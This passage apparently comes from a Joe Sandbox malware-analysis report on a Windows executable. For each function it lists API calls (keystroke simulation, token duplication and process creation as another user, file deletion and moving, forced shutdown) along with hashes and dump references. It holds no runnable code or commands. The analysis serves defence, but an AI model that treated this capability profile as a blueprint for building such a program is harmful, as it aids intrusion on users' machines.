                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 2889586943-2988720461
                                                                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                • _wcslen.LIBCMT ref: 00446498
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                • String ID: $@OH$default$winsta0
                                                                                                • API String ID: 3324942560-3791954436
                                                                                                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • _wcscat.LIBCMT ref: 0044BD94
                                                                                                • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                • _wcscat.LIBCMT ref: 0044BE83
                                                                                                • _wcscat.LIBCMT ref: 0044BE95
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2188072990-1173974218
                                                                                                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                • __swprintf.LIBCMT ref: 004789D3
                                                                                                • __swprintf.LIBCMT ref: 00478A1D
                                                                                                • __swprintf.LIBCMT ref: 00478A4B
                                                                                                • __swprintf.LIBCMT ref: 00478A79
                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                • __swprintf.LIBCMT ref: 00478AA7
                                                                                                • __swprintf.LIBCMT ref: 00478AD5
                                                                                                • __swprintf.LIBCMT ref: 00478B03
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                • API String ID: 999945258-2428617273
                                                                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                • __wsplitpath.LIBCMT ref: 00403492
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • _wcscpy.LIBCMT ref: 004034A7
                                                                                                • _wcscat.LIBCMT ref: 004034BC
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                • _wcscpy.LIBCMT ref: 004035A0
                                                                                                • _wcslen.LIBCMT ref: 00403623
                                                                                                • _wcslen.LIBCMT ref: 0040367D
                                                                                                Strings
                                                                                                • Unterminated string, xrefs: 00428348
                                                                                                • _, xrefs: 0040371C
                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                • Error opening the file, xrefs: 00428231
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                • API String ID: 3393021363-188983378
                                                                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1409584000-438819550
                                                                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                • __swprintf.LIBCMT ref: 00431C2E
                                                                                                • _wcslen.LIBCMT ref: 00431C3A
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                • String ID: :$\$\??\%s
                                                                                                • API String ID: 2192556992-3457252023
                                                                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                • __swprintf.LIBCMT ref: 004722B9
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderPath$LocalTime__swprintf
                                                                                                • String ID: %.3d
                                                                                                • API String ID: 3337348382-986655627
                                                                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                • String ID: *.*
                                                                                                • API String ID: 2640511053-438819550
                                                                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                • GetLastError.KERNEL32 ref: 00433414
                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 2938487562-3733053543
                                                                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
